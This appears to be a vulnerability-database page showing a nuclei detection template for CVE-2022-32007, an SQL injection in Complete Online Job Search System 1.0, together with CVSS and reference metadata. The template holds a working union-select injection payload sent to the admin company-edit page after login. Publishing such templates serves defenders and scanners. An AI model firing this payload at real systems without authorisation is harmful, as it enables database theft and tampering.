Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

Complete Online Job Search System 1.0 - SQL Injection

🗓️ 16 Jul 2022 20:01:42Reported by ProjectDiscoveryType 
nuclei
 nuclei🔗 github.com👁 5 Views

Complete Online Job Search System 1.0 - SQL Injection vulnerability via /eris/admin/company/index.ph

Show more
Related
Refs
Code
ReporterTitlePublishedViews
Family
NVD		CVE-2022-32007
2 Jun 202216:15
nvd
CNVD		Complete Online Job Search System SQL注入漏洞(CNVD-2022-48789)
9 Jun 202200:00
cnvd
Cvelist		CVE-2022-32007
2 Jun 202215:36
cvelist
CVE		CVE-2022-32007
2 Jun 202216:15
cve
Prion		Sql injection
2 Jun 202216:15
prion
id: CVE-2022-32007

info:
  name: Complete Online Job Search System 1.0 - SQL Injection
  author: arafatansari
  severity: high
  description: |
    Complete Online Job Search System 1.0 contains a SQL injection vulnerability via /eris/admin/company/index.php?view=edit&id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database or modify its contents.
  remediation: |
    Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Complete Online Job Search System 1.0.
  reference:
    - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-2.md
    - https://nvd.nist.gov/vuln/detail/CVE-2022-32007
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2022-32007
    cwe-id: CWE-89
    epss-score: 0.01429
    epss-percentile: 0.85199
    cpe: cpe:2.3:a:complete_online_job_search_system_project:complete_online_job_search_system:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: complete_online_job_search_system_project
    product: complete_online_job_search_system
  tags: cve,cve2022,sqli,eris,authenticated,complete_online_job_search_system_project
variables:
  num: "999999999"

http:
  - raw:
      - |
        POST /admin/login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user_email={{username}}&user_pass={{password}}&btnLogin=
      - |
        GET /admin/company/index.php?view=edit&id=-3%27%20union%20select%201,md5({{num}}),3,4,5,6--+ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - '{{md5({{num}})}}'
# digest: 490a0046304402205c2b74c2e844ed003bf289cf18aca74e30ba3cd4098db1873947655f3b94fa1702203b469e31d28bed3566832b2b1f4867d106e2589d358906a7271b32a7589cf8bd:922c64590222798bb761d5b6d8e72950

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
16 Jul 2022 20:42Current
7.2High risk
Vulners AI Score7.2
CVSS26.5
CVSS37.2
EPSS0.22896
cve-2022-32007sql injectionsensitive informationunauthorized operationspatchupdatecomplete online job search system project
5
.json
Report